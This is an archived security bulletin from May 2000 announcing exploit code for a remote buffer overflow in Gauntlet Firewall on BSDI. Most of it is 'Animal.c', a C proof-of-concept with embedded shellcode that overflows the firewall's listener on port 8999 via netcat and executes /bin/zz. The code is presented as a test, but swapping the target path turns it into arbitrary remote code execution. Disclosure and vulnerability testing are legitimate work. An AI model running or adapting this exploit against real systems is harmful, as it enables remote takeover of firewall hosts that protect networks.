Subject: [EXPL] Gauntlet Firewall exploit code has been released
Date: Sat, 27 May 2000 12:30:26 +0200

          Gauntlet Firewall exploit code has been released
--------------------------------------------------------------------------------

SUMMARY

As we reported in our previous article:  <
http://www.securiteam.com/securitynews/Gauntlet_Firewall_for_Unix_and_WebShield_CyberDaemon_buffer_overflow_vulnerability.html>  Gauntlet Firewall for Unix and WebShield CyberDaemon buffer overflow vulnerability, a vulnerability in Gauntlet allows a remote attacker to cause the firewall to execute arbitrary code.
An exploit code has now been released to test for this vulnerability.

DETAILS

The exploit code is written to run a test file called /bin/zz, so you need
to create one in /bin on the Gauntlet firewall and chmod it to 700.
Inside the zz file you should have it do something where it will leave you
a log.  Here is a real simple example:

#!/bin/sh
echo "IT RAN" > /tmp/TEST

Exploit Code:

/*
*                  Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it.  ;) I do not have a Sparc or I would
* write up the Solaris one too.  If you have one, please
* make the changes needed and post it.  Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall.  To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intened for proof of concept only.
*
*
* _Gramble_
*                                             Hey BuBBles
*
*To use:
*      # Animal | nc <address> 8999
*/

#include <stdio.h>

char data[364];

main() {
        int i;
char shelloutput[80];

/* just borrowed this execute code from another exploit */

unsigned char shell[] =
        "\x90"
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";

        for(i=0;i<264;i++)
                data[i]=0x90;
data[i]=0x30;i++;
data[i]=0x9b;i++;
data[i]=0xbf;i++;
data[i]=0xef;i++;
data[i] = 0x00;
for (i=0; i<strlen(shell); i++)
shelloutput[i] = shell[i];
shelloutput[i] = 0x00;

printf("10003.http://%s%s", data, shelloutput);

}

ADDITIONAL INFORMATION

The information has been provided by:  <mailto:gramble_n@HOTMAIL.COM>
gramble none.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.